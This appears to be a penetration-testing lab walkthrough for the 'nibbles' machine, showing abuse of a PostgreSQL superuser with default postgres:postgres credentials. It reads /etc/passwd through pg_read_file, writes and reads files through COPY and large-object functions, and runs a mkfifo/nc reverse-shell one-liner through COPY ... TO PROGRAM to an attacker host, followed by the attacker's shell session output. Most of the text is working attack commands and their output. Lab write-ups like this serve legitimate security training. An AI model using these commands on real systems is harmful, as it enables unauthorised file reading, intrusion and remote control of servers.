PostgreSQL
The target PostgreSQL instance is configured with default credentials for the superuser account; postgres:postgres
Read
postgres=# SELECT pg_read_file('/etc/passwd', 0, 10000);
pg_read_file
-------------------------------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash +
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +
bin:x:2:2:bin:/bin:/usr/sbin/nologin +
sys:x:3:3:sys:/dev:/usr/sbin/nologin +
sync:x:4:65534:sync:/bin:/bin/sync +
games:x:5:60:games:/usr/games:/usr/sbin/nologin +
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin +
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin+
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin +
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin +
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin +
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin +
wilson:x:1000:1000:wilson,,,:/home/wilson:/bin/bash +
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin +
postgres:x:106:113:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash +
Debian-snmp:x:107:114::/var/lib/snmp:/bin/false +
ftp:x:108:117:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin +
(1 row)Reading the /etc/passwd file via pg_read_file
Write
postgres=# COPY (SELECT 'test123') TO '/tmp/test.txt';
COPY 1Using the copy
postgres=# SELECT lo_import('/tmp/test.txt'); -- will create a large object from the file and return the OID
lo_import
-----------
16391
(1 row)
postgres=# SELECT lo_get(16391); -- use the OID returned from the above
lo_get
--------------------
\x746573743132330a
(1 row)
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nibbles_offsec]
└─$ hurl -x '746573743132330a'
Original HEX :: 746573743132330a
ASCII/RAW DEcoded :: test123Confirmed
Exec
postgres=# COPY (SELECT '') to PROGRAM 'mkfifo /tmp/inkzce; nc 192.168.45.245 5437 0</tmp/inkzce | /bin/sh >/tmp/inkzce 2>&1; rm /tmp/inkzce';Sending the reverse shell command
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nibbles_offsec]
└─$ nnc 5437
listening on [any] 5437 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.148.47] 60534
whoami
postgres
hostname
nibbles
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:de:43 brd ff:ff:ff:ff:ff:ff
inet 192.168.148.47/24 brd 192.168.148.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the postgres account via abusing the PostgreSQL superuser privileges